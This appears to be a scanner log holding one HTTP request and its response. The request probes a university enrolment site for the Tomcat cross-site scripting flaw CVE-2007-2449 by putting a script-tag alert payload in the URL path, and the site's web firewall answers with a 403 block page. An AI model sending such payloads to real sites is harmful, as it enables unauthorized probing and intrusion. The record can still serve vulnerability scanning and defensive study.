[CVE-2007-2449] Dumped HTTP request for https://enrolments.hildas.unimelb.edu.au/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp


GET /examples/jsp/snp/snoop.jsp;%3Cscript%3Ealert%28document.domain%29%3C/script%3Etest.jsp HTTP/1.1
Host: enrolments.hildas.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2007-2449] Dumped HTTP response https://enrolments.hildas.unimelb.edu.au/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 826
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3211538=2JiELerCSyOqV16hQ0L/LAxyk2gAAAAAQUIPAAAAAACgbcUxVzKGPTYWLAWtrCW5; expires=Thu, 06 Aug 2026 07:06:48 GMT; HttpOnly; path=/; Domain=.hildas.unimelb.edu.au
Set-Cookie: incap_ses_237_3211538=0FOOfnxDjGWB6barov5JAwxyk2gAAAAAd7HlDQeVXUn4B9stNwkosw==; path=/; Domain=.hildas.unimelb.edu.au
X-Iinfo: 1-1018975-0 0NNN RT(1754493453269 14) q(0 -1 -1 -1) r(0 -1) B15(1,7,7) U25

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/Front-Night-supt-I-keepe-mans-his-rauing-it-of-N" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=1-1018975-0%200NNN%20RT%281754493453269%2014%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c7%2c7%29%20U25&incident_id=237000430032587158-11528186159237825&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032587158-11528186159237825</iframe></body></html>
